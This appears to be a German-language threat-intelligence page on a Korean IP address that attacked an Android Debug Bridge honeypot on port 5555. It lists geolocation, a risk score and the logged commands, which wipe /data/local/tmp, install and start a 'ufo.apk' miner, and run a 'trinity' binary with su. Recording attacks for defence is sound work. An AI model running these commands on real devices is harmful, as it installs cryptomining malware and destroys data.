TROYANOSYVIRUS
Aktive BedrohungNIEDRIG

203.229.224.194

Erste Erkennung19.4.2026
Letzte Aktivitat19.4.2026
ISPKorea Telecom
🎯
28
Gesamtangriffe
🔌
1
Ports
📡
1
Angriffsarten
🦠
4
Malware

Geolokalisierung

Land
🇰🇷 Corea del Sur
Stadt
Guro-gu
ASN
AS4766
ISP
Korea Telecom

Angriffsarten

adb_honeypot

Angegriffene Ports

5555

Zugehorige Malware

Ausgefuhrte Befehle

$rm -f /data/local/tmp/ufo.apk2x
$rm -rf /data/local/tmp/*2x
$pm path com.ufo.miner2x
$am start -n com.ufo.miner/com.example.test.MainActivity2x
$pm install /data/local/tmp/ufo.apk2x
$ps | grep trinity2x
$/data/local/tmp/nohup /data/local/tmp/trinity1x
$/data/local/tmp/nohup su -c /data/local/tmp/trinity1x
$chmod 0755 /data/local/tmp/nohup1x
$chmod 0755 /data/local/tmp/trinity1x

Shodan InternetDB ExpositionShodan

InternetDB-Daten, nicht in Echtzeit

Risikobewertung

30
/100
NiedrigMittelHochKritisch